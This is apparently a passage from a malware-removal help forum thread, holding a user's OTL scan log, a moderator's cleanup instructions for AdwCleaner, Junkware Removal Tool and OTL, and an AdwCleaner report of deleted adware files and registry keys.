[2012/12/22 19:20:33 | 000,001,167 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Roaming\pcouffin.inf
[2012/11/20 17:36:30 | 000,000,017 | ---- | C] () -- C:\Windows\SysWow64\shortcut_ex.dat
[2012/08/25 11:42:13 | 000,000,258 | RHS- | C] () -- C:\Users\Jon Lowry\ntuser.pol
[2012/05/19 07:48:52 | 000,870,128 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Roaming\mcs.rma
[2012/03/31 02:08:06 | 000,153,600 | ---- | C] () -- C:\Windows\SysWow64\WS_ATLMovie.dll
[2012/03/31 01:32:14 | 000,000,126 | ---- | C] () -- C:\Windows\QUICKEN.INI
[2012/03/18 15:06:46 | 000,000,132 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Roaming\Adobe PNG Format CS5 Prefs
[2012/03/02 21:10:42 | 000,000,376 | ---- | C] () -- C:\Windows\ODBC.INI
[2012/02/07 00:22:56 | 000,000,032 | ---- | C] () -- C:\Users\Jon Lowry\jagex_cl_runescape_LIVE.dat
[2011/12/23 15:12:26 | 000,000,097 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Local\fusioncache.dat
[2011/06/03 14:10:04 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2011/05/16 19:50:25 | 000,001,854 | ---- | C] () -- C:\Users\Jon Lowry\AppData\Roaming\GhostObjGAFix.xml
[2011/02/06 00:26:14 | 000,000,117 | ---- | C] () -- C:\Users\Jon Lowry\jagex_runescape_preferences2.dat
[2011/02/06 00:24:11 | 000,000,034 | ---- | C] () -- C:\Users\Jon Lowry\jagex_runescape_preferences.dat
[2011/01/29 10:50:13 | 000,000,124 | -HS- | C] () -- C:\ProgramData\.zreglib

========== ZeroAccess Check ==========

[2009/07/13 20:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2013/07/25 18:24:57 | 014,172,672 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2013/07/25 17:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 17:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 04:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 17:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

========== LOP Check ==========

[2013/03/11 13:37:55 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\.BitTornado
[2013/11/28 00:31:40 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\.minecraft
[2013/08/30 23:09:17 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\AnvSoft
[2013/12/06 15:41:09 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\AVAST Software
[2013/07/20 04:01:07 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Aventail
[2013/08/29 21:47:53 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\AVG
[2013/03/11 13:37:55 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\AVG2013
[2013/12/06 14:52:01 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Azureus
[2012/06/11 19:24:07 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Barnes & Noble
[2013/03/11 13:37:56 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Blackboard
[2013/02/10 15:39:27 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\calibre
[2012/03/18 18:48:43 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1
[2013/09/10 10:33:12 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1
[2012/02/09 12:01:59 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\com.bitcasa.Bitcasa
[2013/10/18 11:59:00 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\com.wd.WDMyCloud
[2013/02/07 00:59:14 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Curiolab
[2013/11/26 00:25:37 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Digiarty
[2013/12/06 14:53:21 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Dropbox
[2011/06/23 08:01:39 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Encryptomatic, LLC
[2013/06/15 11:53:08 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\FamilyTreeMaker
[2013/10/28 18:31:02 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\GetRightToGo
[2011/03/31 12:16:50 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\InterTrust
[2011/11/30 01:38:36 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\MusicNet
[2013/08/19 22:26:12 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Nico Mak Computing
[2013/03/11 13:37:56 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Philips
[2013/03/11 13:37:56 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Philips-Songbird
[2011/06/23 08:01:35 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\PSTViewer
[2013/12/05 23:39:47 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\SearchProtect
[2013/11/20 21:50:07 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\SketchUp
[2013/09/24 05:00:15 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\SoftGrid Client
[2013/12/03 19:51:13 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Spotify
[2011/01/25 11:49:18 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\TP
[2012/12/08 11:14:27 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\TuneUp Software
[2011/08/18 18:38:14 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Unity
[2013/12/02 13:34:50 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\uPlayer
[2013/07/12 23:19:59 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Vso
[2012/01/05 18:25:01 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\wargaming.net
[2013/10/03 19:02:04 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\WDC
[2013/10/17 00:40:37 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Windows Live Writer
[2012/12/14 06:48:20 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Wondershare Video Converter Platinum
[2012/12/16 12:58:00 | 000,000,000 | ---D | M] -- C:\Users\Jon Lowry\AppData\Roaming\Wondershare Video Converter Ultimate

========== Purity Check ==========



========== Alternate Data Streams ==========

@Alternate Data Stream - 178 bytes -> C:\ProgramData\Temp:BF3D62E7
@Alternate Data Stream - 133 bytes -> C:\ProgramData\Temp:0B4227B4
@Alternate Data Stream - 120 bytes -> C:\ProgramData\Temp:373E1720

< End of report >
  • 0

Similar Topics: Computer Freezing and MalwareBytes blocking outbound attempts [Closed]     x


#2
Essexboy

Essexboy

    GeekU Moderator

  • GeekU Moderator
  • 62,615 posts
Hi it seems as though firefox is being used as an ad server/spambot

I will run two different programmes first and then ask for a fresh OTL run

Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete click on "Clean"
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.

THEN

Please download Junkware Removal Tool to your desktop.
  • Right-mouse click JRT.exe and select "Run as Administrator" the tool will open and start scanning your system
  • please be patient as this can take a while to complete depending on your system's specifications
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • post the contents of JRT.txt into your next message.

FINALLY


  • Run OTL.

    Posted Image
  • Select All Users
  • Select LOP and Purity
  • Under the Custom Scan box paste this in

    netsvcs
    BASESERVICES
    %SYSTEMDRIVE%\*.exe
    c:\program files (x86)\Google\Desktop
    c:\program files\Google\Desktop
    dir "%systemdrive%\*" /S /A:L /C
    CREATERESTOREPOINT

  • Click the Run Scan button. Do not change any settings unless otherwise told to do so. The scan wont take long.
  • When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
  • Attach both logs

  • 0

#3
bigredyeeha

bigredyeeha

    Member

  • Member
  • PipPip
  • 33 posts
OTL did not create the extras.txt file. Here are the other logs.

# AdwCleaner v3.014 - Report created 07/12/2013 at 18:27:16
# Updated 01/12/2013 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Jon Lowry - WOLFLING
# Running from : C:\Users\Jon Lowry\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\apn
Folder Deleted : C:\ProgramData\Babylon
Folder Deleted : C:\ProgramData\Conduit
Folder Deleted : C:\ProgramData\QuickSet
Folder Deleted : C:\ProgramData\ssurf aNdo keep
Folder Deleted : C:\ProgramData\suruf annda kEeep
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EZDownloader
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\pc speed up
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PriceGong
Folder Deleted : C:\Program Files (x86)\Conduit
Folder Deleted : C:\Program Files (x86)\Searchprotect
Folder Deleted : C:\Program Files (x86)\TornTV.com
Folder Deleted : C:\Program Files (x86)\Vuze
Folder Deleted : C:\Program Files (x86)\ssurf aNdo keep
Folder Deleted : C:\Program Files (x86)\suruf annda kEeep
Folder Deleted : C:\Windows\SysWOW64\ARFC
Folder Deleted : C:\Windows\SysWOW64\jmdp
Folder Deleted : C:\Windows\SysWOW64\WNLT
Folder Deleted : C:\Windows\System32\ljkb
Folder Deleted : C:\Users\Jon Lowry\AppData\Local\Babylon
Folder Deleted : C:\Users\Jon Lowry\AppData\Local\BeamriseUninstall
Folder Deleted : C:\Users\Jon Lowry\AppData\Local\Conduit
Folder Deleted : C:\Users\Jon Lowry\AppData\Local\DefineExt
Folder Deleted : C:\Users\Jon Lowry\AppData\Local\DownBook
Folder Deleted : C:\Users\Jon Lowry\AppData\Local\NativeMessaging
Folder Deleted : C:\Users\Jon Lowry\AppData\Local\SwvUpdater
Folder Deleted : C:\Users\Jon Lowry\AppData\Local\webplayer
Folder Deleted : C:\Users\Jon Lowry\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\Jon Lowry\AppData\LocalLow\PriceGong
Folder Deleted : C:\Users\Jon Lowry\AppData\LocalLow\Toolbar4
Folder Deleted : C:\Users\Jon Lowry\AppData\LocalLow\WhiteSmoke_New_1.2
Folder Deleted : C:\Users\Jon Lowry\AppData\Roaming\Searchprotect
Folder Deleted : C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TornTV.com
Folder Deleted : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\Smartbar
Folder Deleted : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\ValueApps
Folder Deleted : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\CT3316751
Folder Deleted : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\Extensions\{8A9386B4-E958-4C4C-ADF4-8F26DB3E4829}
Folder Deleted : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\Extensions\{2A47DBFD-567F-4159-AD6A-B0D9CF6CCDFC}
Folder Deleted : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\Extensions\{8f02605d-be4e-41ba-bd00-c39a59c46919}
File Deleted : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\Extensions\gophoto@gophoto.it.xpi
File Deleted : C:\Windows\System32\dmwu.exe
File Deleted : C:\Windows\System32\ImhxxpComm.dll
File Deleted : C:\Program Files (x86)\Mozilla Firefox\browser\nsprotector.js
File Deleted : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\searchplugins\Conduit.xml
File Deleted : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\searchplugins\MyStart Search.xml
File Deleted : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\searchplugins\Sweetpacks Search.xml
File Deleted : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\searchplugins\WebSearch.xml
File Deleted : C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default\user.js
File Deleted : C:\Windows\System32\Tasks\BackgroundContainer Startup Task
File Deleted : C:\Windows\System32\Tasks\Desk 365 RunAsStdUser
File Deleted : C:\Windows\System32\Tasks\GoforFilesUpdate

***** [ Shortcuts ] *****


***** [ Registry ] *****

Value Deleted : HKCU\Software\Mozilla\Firefox\Extensions [{5a95a9e0-59dd-4314-bd84-4d18ca83a0e2}]
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\acaoakiamfeidcmgooclgeleejkbaecf
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\icdlfehblmklkikfigmjhbmmpmkmpooj
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\mhkaekfpcppmmioggniknbnbdbcigpkk
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\nbmafkdmkkckhggblphicnnhlgljnoje
Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [BackgroundContainer]
Key Deleted : HKLM\SOFTWARE\Classes\AppID\TbCommonUtils.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\TbHelper.EXE
Key Deleted : HKLM\SOFTWARE\Classes\Prod.cap
Key Deleted : HKLM\SOFTWARE\Classes\TbCommonUtils.CommonUtils
Key Deleted : HKLM\SOFTWARE\Classes\TbCommonUtils.CommonUtils.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbDownloadManager
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbDownloadManager.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbPropertyManager
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbPropertyManager.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbRequest
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbRequest.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbTask
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbTask.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.ToolbarHelper
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.ToolbarHelper.1
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.ContextMenuNotifier
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.ContextMenuNotifier.1
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.CustomInternetSecurityImpl
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.CustomInternetSecurityImpl.1
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.SearchProviderManager
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.SearchProviderManager.1
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\au__rasapi32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\au__rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\iMesh_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\iMesh_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\IminentSetup{2_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\IminentSetup{2_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\wajam_download_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\wajam_download_RASMANCS
Key Deleted : HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\DeskSvc
Key Deleted : HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\WajamUpdater
Key Deleted : HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\WsysSvc
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{0A18A436-2A7A-49F3-A488-30538A2F6323}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{4CE516A7-F7AC-4628-B411-8F886DC5733E}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{00000001-4FEF-40D3-B3FA-E0531B897F98}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{007EFBDF-8A5D-4930-97CC-A4B437CBA777}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1C950DE5-D31E-42FB-AFB9-91B0161633D8}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3BDF4CE9-E81D-432B-A55E-9F0570CE811F}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{57CADC46-58FF-4105-B733-5A9F3FC9783C}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{64697678-0000-0010-8000-00AA00389B71}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9F34B17E-FF0D-4FAB-97C4-9713FEE79052}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A9A56B8E-2DEB-4ED3-BC92-1FA450BCE1A5}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{AE338F6D-5A7C-4D1D-86E3-C618532079B5}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{C339D489-FABC-41DD-B39D-276101667C70}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D433A9D0-8267-40CB-8AD5-24F22FA5373F}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D565B35E-B787-40FA-95E3-E3562F8FC1A0}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D89031C2-10DA-4C90-9A62-FCED012BC46B}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{01221FCC-4BFB-461C-B08C-F6D2DF309921}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0FA32667-9A8A-4E9C-902F-CA3323180003}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{452AE416-9A97-44CA-93DA-D0F15C36254F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{B87F8B63-7274-43FD-87FA-09D3B7496148}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{C4BAE205-5E02-4E32-876E-F34B4E2D000C}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{EC4085F2-8DB3-45A6-AD0B-CA289F3C5D7E}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{7A4CC00F-474B-4E6C-9B78-EF07E28BF8C2}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{D293AA9C-1992-4CF3-9639-9759EA77B57F}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8F1089DE-99CD-48B4-9903-2CA06DC287DC}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D7F11E74-BEEB-41FB-9038-FFF0D0C06FBD}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DA502C05-7732-4473-A486-FAC2C27351A9}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{92C6E7B4-47EC-41F8-8511-F9B12064F1F0}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{483830EE-A4CD-4B71-B0A3-3D82E62A6909}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{96BD48DD-741B-41AE-AC4A-AFF96BA00F7E}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks [{DA51D4F6-3E7E-4EF8-B400-9198E0874606}]
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{01221FCC-4BFB-461C-B08C-F6D2DF309921}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0FA32667-9A8A-4E9C-902F-CA3323180003}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{452AE416-9A97-44CA-93DA-D0F15C36254F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{78CE34FD-F6D4-4866-B79C-A37268D06A04}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Key Deleted : HKCU\Software\Conduit
Key Deleted : HKCU\Software\GoforFiles
Key Deleted : HKCU\Software\IM
Key Deleted : HKCU\Software\ImInstaller
Key Deleted : HKCU\Software\AppDataLow\Toolbar
Key Deleted : HKCU\Software\AppDataLow\Software\BackgroundContainer
Key Deleted : HKCU\Software\AppDataLow\Software\Conduit
Key Deleted : HKCU\Software\AppDataLow\Software\ConduitSearchScopes
Key Deleted : HKCU\Software\AppDataLow\Software\PriceGong
Key Deleted : HKCU\Software\AppDataLow\Software\SmartBar
Key Deleted : HKCU\Software\AppDataLow\Software\KeyBar_1.14
Key Deleted : HKCU\Software\AppDataLow\Software\WhiteSmoke_New_1.2
Key Deleted : HKLM\Software\Conduit
Key Deleted : HKLM\Software\GoforFiles
Key Deleted : HKLM\Software\hdcode
Key Deleted : HKLM\Software\SearchProtect
Key Deleted : HKLM\Software\SP Global
Key Deleted : HKLM\Software\SProtector
Key Deleted : HKLM\Software\systweak
Key Deleted : HKLM\Software\KeyBar_1.14
Key Deleted : HKLM\Software\WhiteSmoke_New_1.2
Key Deleted : [x64] HKLM\SOFTWARE\Updater By Sweetpacks
Key Deleted : [x64] HKLM\SOFTWARE\wnlt
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C4ED781C-7394-4906-AAFF-D6AB64FF7C38}

***** [ Browsers ] *****

-\\ Internet Explorer v10.0.9200.16736


